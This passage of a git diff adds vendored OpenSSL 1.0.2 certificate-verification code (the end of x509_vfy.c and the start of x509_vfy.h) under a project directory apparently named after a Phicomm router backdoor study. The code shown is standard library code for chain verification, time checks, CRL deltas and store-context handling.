+        if (!ctx->verify_cb(0, ctx))
+            return 0;
+    }
+
+    i = X509_cmp_time(X509_get_notAfter(x), ptime);
+    if (i == 0) {
+        ctx->error = X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD;
+        ctx->current_cert = x;
+        if (!ctx->verify_cb(0, ctx))
+            return 0;
+    }
+
+    if (i < 0) {
+        ctx->error = X509_V_ERR_CERT_HAS_EXPIRED;
+        ctx->current_cert = x;
+        if (!ctx->verify_cb(0, ctx))
+            return 0;
+    }
+
+    return 1;
+}
+
+static int internal_verify(X509_STORE_CTX *ctx)
+{
+    int ok = 0, n;
+    X509 *xs, *xi;
+    EVP_PKEY *pkey = NULL;
+    int (*cb) (int xok, X509_STORE_CTX *xctx);
+
+    cb = ctx->verify_cb;
+
+    n = sk_X509_num(ctx->chain);
+    ctx->error_depth = n - 1;
+    n--;
+    xi = sk_X509_value(ctx->chain, n);
+
+    if (ctx->check_issued(ctx, xi, xi))
+        xs = xi;
+    else {
+        if (ctx->param->flags & X509_V_FLAG_PARTIAL_CHAIN) {
+            xs = xi;
+            goto check_cert;
+        }
+        if (n <= 0) {
+            ctx->error = X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE;
+            ctx->current_cert = xi;
+            ok = cb(0, ctx);
+            goto end;
+        } else {
+            n--;
+            ctx->error_depth = n;
+            xs = sk_X509_value(ctx->chain, n);
+        }
+    }
+
+/*      ctx->error=0;  not needed */
+    while (n >= 0) {
+        ctx->error_depth = n;
+
+        /*
+         * Skip signature check for self signed certificates unless
+         * explicitly asked for. It doesn't add any security and just wastes
+         * time.
+         */
+        if (!xs->valid
+            && (xs != xi
+                || (ctx->param->flags & X509_V_FLAG_CHECK_SS_SIGNATURE))) {
+            if ((pkey = X509_get_pubkey(xi)) == NULL) {
+                ctx->error = X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY;
+                ctx->current_cert = xi;
+                ok = (*cb) (0, ctx);
+                if (!ok)
+                    goto end;
+            } else if (X509_verify(xs, pkey) <= 0) {
+                ctx->error = X509_V_ERR_CERT_SIGNATURE_FAILURE;
+                ctx->current_cert = xs;
+                ok = (*cb) (0, ctx);
+                if (!ok) {
+                    EVP_PKEY_free(pkey);
+                    goto end;
+                }
+            }
+            EVP_PKEY_free(pkey);
+            pkey = NULL;
+        }
+
+        xs->valid = 1;
+
+ check_cert:
+        ok = check_cert_time(ctx, xs);
+        if (!ok)
+            goto end;
+
+        /* The last error (if any) is still in the error value */
+        ctx->current_issuer = xi;
+        ctx->current_cert = xs;
+        ok = (*cb) (1, ctx);
+        if (!ok)
+            goto end;
+
+        n--;
+        if (n >= 0) {
+            xi = xs;
+            xs = sk_X509_value(ctx->chain, n);
+        }
+    }
+    ok = 1;
+ end:
+    return ok;
+}
+
+int X509_cmp_current_time(const ASN1_TIME *ctm)
+{
+    return X509_cmp_time(ctm, NULL);
+}
+
+int X509_cmp_time(const ASN1_TIME *ctm, time_t *cmp_time)
+{
+    char *str;
+    ASN1_TIME atm;
+    long offset;
+    char buff1[24], buff2[24], *p;
+    int i, j;
+
+    p = buff1;
+    i = ctm->length;
+    str = (char *)ctm->data;
+    if (ctm->type == V_ASN1_UTCTIME) {
+        if ((i < 11) || (i > 17))
+            return 0;
+        memcpy(p, str, 10);
+        p += 10;
+        str += 10;
+    } else {
+        if (i < 13)
+            return 0;
+        memcpy(p, str, 12);
+        p += 12;
+        str += 12;
+    }
+
+    if ((*str == 'Z') || (*str == '-') || (*str == '+')) {
+        *(p++) = '0';
+        *(p++) = '0';
+    } else {
+        *(p++) = *(str++);
+        *(p++) = *(str++);
+        /* Skip any fractional seconds... */
+        if (*str == '.') {
+            str++;
+            while ((*str >= '0') && (*str <= '9'))
+                str++;
+        }
+
+    }
+    *(p++) = 'Z';
+    *(p++) = '\0';
+
+    if (*str == 'Z')
+        offset = 0;
+    else {
+        if ((*str != '+') && (*str != '-'))
+            return 0;
+        offset = ((str[1] - '0') * 10 + (str[2] - '0')) * 60;
+        offset += (str[3] - '0') * 10 + (str[4] - '0');
+        if (*str == '-')
+            offset = -offset;
+    }
+    atm.type = ctm->type;
+    atm.flags = 0;
+    atm.length = sizeof(buff2);
+    atm.data = (unsigned char *)buff2;
+
+    if (X509_time_adj(&atm, offset * 60, cmp_time) == NULL)
+        return 0;
+
+    if (ctm->type == V_ASN1_UTCTIME) {
+        i = (buff1[0] - '0') * 10 + (buff1[1] - '0');
+        if (i < 50)
+            i += 100;           /* cf. RFC 2459 */
+        j = (buff2[0] - '0') * 10 + (buff2[1] - '0');
+        if (j < 50)
+            j += 100;
+
+        if (i < j)
+            return -1;
+        if (i > j)
+            return 1;
+    }
+    i = strcmp(buff1, buff2);
+    if (i == 0)                 /* wait a second then return younger :-) */
+        return -1;
+    else
+        return i;
+}
+
+ASN1_TIME *X509_gmtime_adj(ASN1_TIME *s, long adj)
+{
+    return X509_time_adj(s, adj, NULL);
+}
+
+ASN1_TIME *X509_time_adj(ASN1_TIME *s, long offset_sec, time_t *in_tm)
+{
+    return X509_time_adj_ex(s, 0, offset_sec, in_tm);
+}
+
+ASN1_TIME *X509_time_adj_ex(ASN1_TIME *s,
+                            int offset_day, long offset_sec, time_t *in_tm)
+{
+    time_t t;
+
+    if (in_tm)
+        t = *in_tm;
+    else
+        time(&t);
+
+    if (s && !(s->flags & ASN1_STRING_FLAG_MSTRING)) {
+        if (s->type == V_ASN1_UTCTIME)
+            return ASN1_UTCTIME_adj(s, t, offset_day, offset_sec);
+        if (s->type == V_ASN1_GENERALIZEDTIME)
+            return ASN1_GENERALIZEDTIME_adj(s, t, offset_day, offset_sec);
+    }
+    return ASN1_TIME_adj(s, t, offset_day, offset_sec);
+}
+
+int X509_get_pubkey_parameters(EVP_PKEY *pkey, STACK_OF(X509) *chain)
+{
+    EVP_PKEY *ktmp = NULL, *ktmp2;
+    int i, j;
+
+    if ((pkey != NULL) && !EVP_PKEY_missing_parameters(pkey))
+        return 1;
+
+    for (i = 0; i < sk_X509_num(chain); i++) {
+        ktmp = X509_get_pubkey(sk_X509_value(chain, i));
+        if (ktmp == NULL) {
+            X509err(X509_F_X509_GET_PUBKEY_PARAMETERS,
+                    X509_R_UNABLE_TO_GET_CERTS_PUBLIC_KEY);
+            return 0;
+        }
+        if (!EVP_PKEY_missing_parameters(ktmp))
+            break;
+        else {
+            EVP_PKEY_free(ktmp);
+            ktmp = NULL;
+        }
+    }
+    if (ktmp == NULL) {
+        X509err(X509_F_X509_GET_PUBKEY_PARAMETERS,
+                X509_R_UNABLE_TO_FIND_PARAMETERS_IN_CHAIN);
+        return 0;
+    }
+
+    /* first, populate the other certs */
+    for (j = i - 1; j >= 0; j--) {
+        ktmp2 = X509_get_pubkey(sk_X509_value(chain, j));
+        EVP_PKEY_copy_parameters(ktmp2, ktmp);
+        EVP_PKEY_free(ktmp2);
+    }
+
+    if (pkey != NULL)
+        EVP_PKEY_copy_parameters(pkey, ktmp);
+    EVP_PKEY_free(ktmp);
+    return 1;
+}
+
+/* Make a delta CRL as the diff between two full CRLs */
+
+X509_CRL *X509_CRL_diff(X509_CRL *base, X509_CRL *newer,
+                        EVP_PKEY *skey, const EVP_MD *md, unsigned int flags)
+{
+    X509_CRL *crl = NULL;
+    int i;
+    STACK_OF(X509_REVOKED) *revs = NULL;
+    /* CRLs can't be delta already */
+    if (base->base_crl_number || newer->base_crl_number) {
+        X509err(X509_F_X509_CRL_DIFF, X509_R_CRL_ALREADY_DELTA);
+        return NULL;
+    }
+    /* Base and new CRL must have a CRL number */
+    if (!base->crl_number || !newer->crl_number) {
+        X509err(X509_F_X509_CRL_DIFF, X509_R_NO_CRL_NUMBER);
+        return NULL;
+    }
+    /* Issuer names must match */
+    if (X509_NAME_cmp(X509_CRL_get_issuer(base), X509_CRL_get_issuer(newer))) {
+        X509err(X509_F_X509_CRL_DIFF, X509_R_ISSUER_MISMATCH);
+        return NULL;
+    }
+    /* AKID and IDP must match */
+    if (!crl_extension_match(base, newer, NID_authority_key_identifier)) {
+        X509err(X509_F_X509_CRL_DIFF, X509_R_AKID_MISMATCH);
+        return NULL;
+    }
+    if (!crl_extension_match(base, newer, NID_issuing_distribution_point)) {
+        X509err(X509_F_X509_CRL_DIFF, X509_R_IDP_MISMATCH);
+        return NULL;
+    }
+    /* Newer CRL number must exceed full CRL number */
+    if (ASN1_INTEGER_cmp(newer->crl_number, base->crl_number) <= 0) {
+        X509err(X509_F_X509_CRL_DIFF, X509_R_NEWER_CRL_NOT_NEWER);
+        return NULL;
+    }
+    /* CRLs must verify */
+    if (skey && (X509_CRL_verify(base, skey) <= 0 ||
+                 X509_CRL_verify(newer, skey) <= 0)) {
+        X509err(X509_F_X509_CRL_DIFF, X509_R_CRL_VERIFY_FAILURE);
+        return NULL;
+    }
+    /* Create new CRL */
+    crl = X509_CRL_new();
+    if (!crl || !X509_CRL_set_version(crl, 1))
+        goto memerr;
+    /* Set issuer name */
+    if (!X509_CRL_set_issuer_name(crl, X509_CRL_get_issuer(newer)))
+        goto memerr;
+
+    if (!X509_CRL_set_lastUpdate(crl, X509_CRL_get_lastUpdate(newer)))
+        goto memerr;
+    if (!X509_CRL_set_nextUpdate(crl, X509_CRL_get_nextUpdate(newer)))
+        goto memerr;
+
+    /* Set base CRL number: must be critical */
+
+    if (!X509_CRL_add1_ext_i2d(crl, NID_delta_crl, base->crl_number, 1, 0))
+        goto memerr;
+
+    /*
+     * Copy extensions across from newest CRL to delta: this will set CRL
+     * number to correct value too.
+     */
+
+    for (i = 0; i < X509_CRL_get_ext_count(newer); i++) {
+        X509_EXTENSION *ext;
+        ext = X509_CRL_get_ext(newer, i);
+        if (!X509_CRL_add_ext(crl, ext, -1))
+            goto memerr;
+    }
+
+    /* Go through revoked entries, copying as needed */
+
+    revs = X509_CRL_get_REVOKED(newer);
+
+    for (i = 0; i < sk_X509_REVOKED_num(revs); i++) {
+        X509_REVOKED *rvn, *rvtmp;
+        rvn = sk_X509_REVOKED_value(revs, i);
+        /*
+         * Add only if not also in base. TODO: need something cleverer here
+         * for some more complex CRLs covering multiple CAs.
+         */
+        if (!X509_CRL_get0_by_serial(base, &rvtmp, rvn->serialNumber)) {
+            rvtmp = X509_REVOKED_dup(rvn);
+            if (!rvtmp)
+                goto memerr;
+            if (!X509_CRL_add0_revoked(crl, rvtmp)) {
+                X509_REVOKED_free(rvtmp);
+                goto memerr;
+            }
+        }
+    }
+    /* TODO: optionally prune deleted entries */
+
+    if (skey && md && !X509_CRL_sign(crl, skey, md))
+        goto memerr;
+
+    return crl;
+
+ memerr:
+    X509err(X509_F_X509_CRL_DIFF, ERR_R_MALLOC_FAILURE);
+    if (crl)
+        X509_CRL_free(crl);
+    return NULL;
+}
+
+int X509_STORE_CTX_get_ex_new_index(long argl, void *argp,
+                                    CRYPTO_EX_new *new_func,
+                                    CRYPTO_EX_dup *dup_func,
+                                    CRYPTO_EX_free *free_func)
+{
+    /*
+     * This function is (usually) called only once, by
+     * SSL_get_ex_data_X509_STORE_CTX_idx (ssl/ssl_cert.c).
+     */
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_X509_STORE_CTX, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int X509_STORE_CTX_set_ex_data(X509_STORE_CTX *ctx, int idx, void *data)
+{
+    return CRYPTO_set_ex_data(&ctx->ex_data, idx, data);
+}
+
+void *X509_STORE_CTX_get_ex_data(X509_STORE_CTX *ctx, int idx)
+{
+    return CRYPTO_get_ex_data(&ctx->ex_data, idx);
+}
+
+int X509_STORE_CTX_get_error(X509_STORE_CTX *ctx)
+{
+    return ctx->error;
+}
+
+void X509_STORE_CTX_set_error(X509_STORE_CTX *ctx, int err)
+{
+    ctx->error = err;
+}
+
+int X509_STORE_CTX_get_error_depth(X509_STORE_CTX *ctx)
+{
+    return ctx->error_depth;
+}
+
+X509 *X509_STORE_CTX_get_current_cert(X509_STORE_CTX *ctx)
+{
+    return ctx->current_cert;
+}
+
+STACK_OF(X509) *X509_STORE_CTX_get_chain(X509_STORE_CTX *ctx)
+{
+    return ctx->chain;
+}
+
+STACK_OF(X509) *X509_STORE_CTX_get1_chain(X509_STORE_CTX *ctx)
+{
+    if (!ctx->chain)
+        return NULL;
+    return X509_chain_up_ref(ctx->chain);
+}
+
+X509 *X509_STORE_CTX_get0_current_issuer(X509_STORE_CTX *ctx)
+{
+    return ctx->current_issuer;
+}
+
+X509_CRL *X509_STORE_CTX_get0_current_crl(X509_STORE_CTX *ctx)
+{
+    return ctx->current_crl;
+}
+
+X509_STORE_CTX *X509_STORE_CTX_get0_parent_ctx(X509_STORE_CTX *ctx)
+{
+    return ctx->parent;
+}
+
+void X509_STORE_CTX_set_cert(X509_STORE_CTX *ctx, X509 *x)
+{
+    ctx->cert = x;
+}
+
+void X509_STORE_CTX_set_chain(X509_STORE_CTX *ctx, STACK_OF(X509) *sk)
+{
+    ctx->untrusted = sk;
+}
+
+void X509_STORE_CTX_set0_crls(X509_STORE_CTX *ctx, STACK_OF(X509_CRL) *sk)
+{
+    ctx->crls = sk;
+}
+
+int X509_STORE_CTX_set_purpose(X509_STORE_CTX *ctx, int purpose)
+{
+    return X509_STORE_CTX_purpose_inherit(ctx, 0, purpose, 0);
+}
+
+int X509_STORE_CTX_set_trust(X509_STORE_CTX *ctx, int trust)
+{
+    return X509_STORE_CTX_purpose_inherit(ctx, 0, 0, trust);
+}
+
+/*
+ * This function is used to set the X509_STORE_CTX purpose and trust values.
+ * This is intended to be used when another structure has its own trust and
+ * purpose values which (if set) will be inherited by the ctx. If they aren't
+ * set then we will usually have a default purpose in mind which should then
+ * be used to set the trust value. An example of this is SSL use: an SSL
+ * structure will have its own purpose and trust settings which the
+ * application can set: if they aren't set then we use the default of SSL
+ * client/server.
+ */
+
+int X509_STORE_CTX_purpose_inherit(X509_STORE_CTX *ctx, int def_purpose,
+                                   int purpose, int trust)
+{
+    int idx;
+    /* If purpose not set use default */
+    if (!purpose)
+        purpose = def_purpose;
+    /* If we have a purpose then check it is valid */
+    if (purpose) {
+        X509_PURPOSE *ptmp;
+        idx = X509_PURPOSE_get_by_id(purpose);
+        if (idx == -1) {
+            X509err(X509_F_X509_STORE_CTX_PURPOSE_INHERIT,
+                    X509_R_UNKNOWN_PURPOSE_ID);
+            return 0;
+        }
+        ptmp = X509_PURPOSE_get0(idx);
+        if (ptmp->trust == X509_TRUST_DEFAULT) {
+            idx = X509_PURPOSE_get_by_id(def_purpose);
+            if (idx == -1) {
+                X509err(X509_F_X509_STORE_CTX_PURPOSE_INHERIT,
+                        X509_R_UNKNOWN_PURPOSE_ID);
+                return 0;
+            }
+            ptmp = X509_PURPOSE_get0(idx);
+        }
+        /* If trust not set then get from purpose default */
+        if (!trust)
+            trust = ptmp->trust;
+    }
+    if (trust) {
+        idx = X509_TRUST_get_by_id(trust);
+        if (idx == -1) {
+            X509err(X509_F_X509_STORE_CTX_PURPOSE_INHERIT,
+                    X509_R_UNKNOWN_TRUST_ID);
+            return 0;
+        }
+    }
+
+    if (purpose && !ctx->param->purpose)
+        ctx->param->purpose = purpose;
+    if (trust && !ctx->param->trust)
+        ctx->param->trust = trust;
+    return 1;
+}
+
+X509_STORE_CTX *X509_STORE_CTX_new(void)
+{
+    X509_STORE_CTX *ctx;
+    ctx = (X509_STORE_CTX *)OPENSSL_malloc(sizeof(X509_STORE_CTX));
+    if (!ctx) {
+        X509err(X509_F_X509_STORE_CTX_NEW, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    memset(ctx, 0, sizeof(X509_STORE_CTX));
+    return ctx;
+}
+
+void X509_STORE_CTX_free(X509_STORE_CTX *ctx)
+{
+    X509_STORE_CTX_cleanup(ctx);
+    OPENSSL_free(ctx);
+}
+
+int X509_STORE_CTX_init(X509_STORE_CTX *ctx, X509_STORE *store, X509 *x509,
+                        STACK_OF(X509) *chain)
+{
+    int ret = 1;
+    ctx->ctx = store;
+    ctx->current_method = 0;
+    ctx->cert = x509;
+    ctx->untrusted = chain;
+    ctx->crls = NULL;
+    ctx->last_untrusted = 0;
+    ctx->other_ctx = NULL;
+    ctx->valid = 0;
+    ctx->chain = NULL;
+    ctx->error = 0;
+    ctx->explicit_policy = 0;
+    ctx->error_depth = 0;
+    ctx->current_cert = NULL;
+    ctx->current_issuer = NULL;
+    ctx->current_crl = NULL;
+    ctx->current_crl_score = 0;
+    ctx->current_reasons = 0;
+    ctx->tree = NULL;
+    ctx->parent = NULL;
+
+    ctx->param = X509_VERIFY_PARAM_new();
+
+    if (!ctx->param) {
+        X509err(X509_F_X509_STORE_CTX_INIT, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    /*
+     * Inherit callbacks and flags from X509_STORE if not set use defaults.
+     */
+
+    if (store)
+        ret = X509_VERIFY_PARAM_inherit(ctx->param, store->param);
+    else
+        ctx->param->inh_flags |= X509_VP_FLAG_DEFAULT | X509_VP_FLAG_ONCE;
+
+    if (store) {
+        ctx->verify_cb = store->verify_cb;
+        ctx->cleanup = store->cleanup;
+    } else
+        ctx->cleanup = 0;
+
+    if (ret)
+        ret = X509_VERIFY_PARAM_inherit(ctx->param,
+                                        X509_VERIFY_PARAM_lookup("default"));
+
+    if (ret == 0) {
+        X509err(X509_F_X509_STORE_CTX_INIT, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    if (store && store->check_issued)
+        ctx->check_issued = store->check_issued;
+    else
+        ctx->check_issued = check_issued;
+
+    if (store && store->get_issuer)
+        ctx->get_issuer = store->get_issuer;
+    else
+        ctx->get_issuer = X509_STORE_CTX_get1_issuer;
+
+    if (store && store->verify_cb)
+        ctx->verify_cb = store->verify_cb;
+    else
+        ctx->verify_cb = null_callback;
+
+    if (store && store->verify)
+        ctx->verify = store->verify;
+    else
+        ctx->verify = internal_verify;
+
+    if (store && store->check_revocation)
+        ctx->check_revocation = store->check_revocation;
+    else
+        ctx->check_revocation = check_revocation;
+
+    if (store && store->get_crl)
+        ctx->get_crl = store->get_crl;
+    else
+        ctx->get_crl = NULL;
+
+    if (store && store->check_crl)
+        ctx->check_crl = store->check_crl;
+    else
+        ctx->check_crl = check_crl;
+
+    if (store && store->cert_crl)
+        ctx->cert_crl = store->cert_crl;
+    else
+        ctx->cert_crl = cert_crl;
+
+    if (store && store->lookup_certs)
+        ctx->lookup_certs = store->lookup_certs;
+    else
+        ctx->lookup_certs = X509_STORE_get1_certs;
+
+    if (store && store->lookup_crls)
+        ctx->lookup_crls = store->lookup_crls;
+    else
+        ctx->lookup_crls = X509_STORE_get1_crls;
+
+    ctx->check_policy = check_policy;
+
+    /*
+     * This memset() can't make any sense anyway, so it's removed. As
+     * X509_STORE_CTX_cleanup does a proper "free" on the ex_data, we put a
+     * corresponding "new" here and remove this bogus initialisation.
+     */
+    /* memset(&(ctx->ex_data),0,sizeof(CRYPTO_EX_DATA)); */
+    if (!CRYPTO_new_ex_data(CRYPTO_EX_INDEX_X509_STORE_CTX, ctx,
+                            &(ctx->ex_data))) {
+        OPENSSL_free(ctx);
+        X509err(X509_F_X509_STORE_CTX_INIT, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    return 1;
+}
+
+/*
+ * Set alternative lookup method: just a STACK of trusted certificates. This
+ * avoids X509_STORE nastiness where it isn't needed.
+ */
+
+void X509_STORE_CTX_trusted_stack(X509_STORE_CTX *ctx, STACK_OF(X509) *sk)
+{
+    ctx->other_ctx = sk;
+    ctx->get_issuer = get_issuer_sk;
+}
+
+void X509_STORE_CTX_cleanup(X509_STORE_CTX *ctx)
+{
+    if (ctx->cleanup)
+        ctx->cleanup(ctx);
+    if (ctx->param != NULL) {
+        if (ctx->parent == NULL)
+            X509_VERIFY_PARAM_free(ctx->param);
+        ctx->param = NULL;
+    }
+    if (ctx->tree != NULL) {
+        X509_policy_tree_free(ctx->tree);
+        ctx->tree = NULL;
+    }
+    if (ctx->chain != NULL) {
+        sk_X509_pop_free(ctx->chain, X509_free);
+        ctx->chain = NULL;
+    }
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_X509_STORE_CTX, ctx, &(ctx->ex_data));
+    memset(&ctx->ex_data, 0, sizeof(CRYPTO_EX_DATA));
+}
+
+void X509_STORE_CTX_set_depth(X509_STORE_CTX *ctx, int depth)
+{
+    X509_VERIFY_PARAM_set_depth(ctx->param, depth);
+}
+
+void X509_STORE_CTX_set_flags(X509_STORE_CTX *ctx, unsigned long flags)
+{
+    X509_VERIFY_PARAM_set_flags(ctx->param, flags);
+}
+
+void X509_STORE_CTX_set_time(X509_STORE_CTX *ctx, unsigned long flags,
+                             time_t t)
+{
+    X509_VERIFY_PARAM_set_time(ctx->param, t);
+}
+
+void X509_STORE_CTX_set_verify_cb(X509_STORE_CTX *ctx,
+                                  int (*verify_cb) (int, X509_STORE_CTX *))
+{
+    ctx->verify_cb = verify_cb;
+}
+
+X509_POLICY_TREE *X509_STORE_CTX_get0_policy_tree(X509_STORE_CTX *ctx)
+{
+    return ctx->tree;
+}
+
+int X509_STORE_CTX_get_explicit_policy(X509_STORE_CTX *ctx)
+{
+    return ctx->explicit_policy;
+}
+
+int X509_STORE_CTX_set_default(X509_STORE_CTX *ctx, const char *name)
+{
+    const X509_VERIFY_PARAM *param;
+    param = X509_VERIFY_PARAM_lookup(name);
+    if (!param)
+        return 0;
+    return X509_VERIFY_PARAM_inherit(ctx->param, param);
+}
+
+X509_VERIFY_PARAM *X509_STORE_CTX_get0_param(X509_STORE_CTX *ctx)
+{
+    return ctx->param;
+}
+
+void X509_STORE_CTX_set0_param(X509_STORE_CTX *ctx, X509_VERIFY_PARAM *param)
+{
+    if (ctx->param)
+        X509_VERIFY_PARAM_free(ctx->param);
+    ctx->param = param;
+}
+
+IMPLEMENT_STACK_OF(X509)
+
+IMPLEMENT_ASN1_SET_OF(X509)
+
+IMPLEMENT_STACK_OF(X509_NAME)
+
+IMPLEMENT_STACK_OF(X509_ATTRIBUTE)
+
+IMPLEMENT_ASN1_SET_OF(X509_ATTRIBUTE)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vfy.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vfy.h
new file mode 100644
index 0000000..a6f0df5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vfy.h
@@ -0,0 +1,641 @@
+/* crypto/x509/x509_vfy.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_X509_H
+# include <openssl/x509.h>
+/*
+ * openssl/x509.h ends up #include-ing this file at about the only
+ * appropriate moment.
+ */
+#endif
+
+#ifndef HEADER_X509_VFY_H
+# define HEADER_X509_VFY_H
+
+# include <openssl/opensslconf.h>
+# ifndef OPENSSL_NO_LHASH
+#  include <openssl/lhash.h>
+# endif
+# include <openssl/bio.h>
+# include <openssl/crypto.h>
+# include <openssl/symhacks.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# if 0
+/* Outer object */
+typedef struct x509_hash_dir_st {
+    int num_dirs;
+    char **dirs;
+    int *dirs_type;
+    int num_dirs_alloced;
+} X509_HASH_DIR_CTX;
+# endif
+
+typedef struct x509_file_st {
+    int num_paths;              /* number of paths to files or directories */
+    int num_alloced;
+    char **paths;               /* the list of paths or directories */
+    int *path_type;
+} X509_CERT_FILE_CTX;
+
+/*******************************/
+/*-
+SSL_CTX -> X509_STORE
+                -> X509_LOOKUP
+                        ->X509_LOOKUP_METHOD
+                -> X509_LOOKUP
+                        ->X509_LOOKUP_METHOD
+
+SSL     -> X509_STORE_CTX
+                ->X509_STORE
+
+The X509_STORE holds the tables etc for verification stuff.
+A X509_STORE_CTX is used while validating a single certificate.
+The X509_STORE has X509_LOOKUPs for looking up certs.
+The X509_STORE then calls a function to actually verify the
+certificate chain.
+*/
+
+# define X509_LU_RETRY           -1
+# define X509_LU_FAIL            0
+# define X509_LU_X509            1
+# define X509_LU_CRL             2
+# define X509_LU_PKEY            3
+
+typedef struct x509_object_st {
+    /* one of the above types */
+    int type;
+    union {
+        char *ptr;
+        X509 *x509;
+        X509_CRL *crl;
+        EVP_PKEY *pkey;
+    } data;
+} X509_OBJECT;
+
+typedef struct x509_lookup_st X509_LOOKUP;
+
+DECLARE_STACK_OF(X509_LOOKUP)
+DECLARE_STACK_OF(X509_OBJECT)
+
+/* This is a static that defines the function interface */
+typedef struct x509_lookup_method_st {
+    const char *name;
+    int (*new_item) (X509_LOOKUP *ctx);
+    void (*free) (X509_LOOKUP *ctx);
+    int (*init) (X509_LOOKUP *ctx);
+    int (*shutdown) (X509_LOOKUP *ctx);
+    int (*ctrl) (X509_LOOKUP *ctx, int cmd, const char *argc, long argl,
+                 char **ret);
+    int (*get_by_subject) (X509_LOOKUP *ctx, int type, X509_NAME *name,
+                           X509_OBJECT *ret);
+    int (*get_by_issuer_serial) (X509_LOOKUP *ctx, int type, X509_NAME *name,
+                                 ASN1_INTEGER *serial, X509_OBJECT *ret);
+    int (*get_by_fingerprint) (X509_LOOKUP *ctx, int type,
+                               unsigned char *bytes, int len,
+                               X509_OBJECT *ret);
+    int (*get_by_alias) (X509_LOOKUP *ctx, int type, char *str, int len,
+                         X509_OBJECT *ret);
+} X509_LOOKUP_METHOD;
+
+typedef struct X509_VERIFY_PARAM_ID_st X509_VERIFY_PARAM_ID;
+
+/*
+ * This structure hold all parameters associated with a verify operation by
+ * including an X509_VERIFY_PARAM structure in related structures the
+ * parameters used can be customized
+ */
+
+typedef struct X509_VERIFY_PARAM_st {
+    char *name;
+    time_t check_time;          /* Time to use */
+    unsigned long inh_flags;    /* Inheritance flags */
+    unsigned long flags;        /* Various verify flags */
+    int purpose;                /* purpose to check untrusted certificates */
+    int trust;                  /* trust setting to check */
+    int depth;                  /* Verify depth */
+    STACK_OF(ASN1_OBJECT) *policies; /* Permissible policies */
+    X509_VERIFY_PARAM_ID *id;   /* opaque ID data */
+} X509_VERIFY_PARAM;
+
+DECLARE_STACK_OF(X509_VERIFY_PARAM)
+
+/*
+ * This is used to hold everything.  It is used for all certificate
+ * validation.  Once we have a certificate chain, the 'verify' function is
+ * then called to actually check the cert chain.
+ */
+struct x509_store_st {
+    /* The following is a cache of trusted certs */
+    int cache;                  /* if true, stash any hits */
+    STACK_OF(X509_OBJECT) *objs; /* Cache of all objects */
+    /* These are external lookup methods */
+    STACK_OF(X509_LOOKUP) *get_cert_methods;
+    X509_VERIFY_PARAM *param;
+    /* Callbacks for various operations */
+    /* called to verify a certificate */
+    int (*verify) (X509_STORE_CTX *ctx);
+    /* error callback */
+    int (*verify_cb) (int ok, X509_STORE_CTX *ctx);
+    /* get issuers cert from ctx */
+    int (*get_issuer) (X509 **issuer, X509_STORE_CTX *ctx, X509 *x);
+    /* check issued */
+    int (*check_issued) (X509_STORE_CTX *ctx, X509 *x, X509 *issuer);
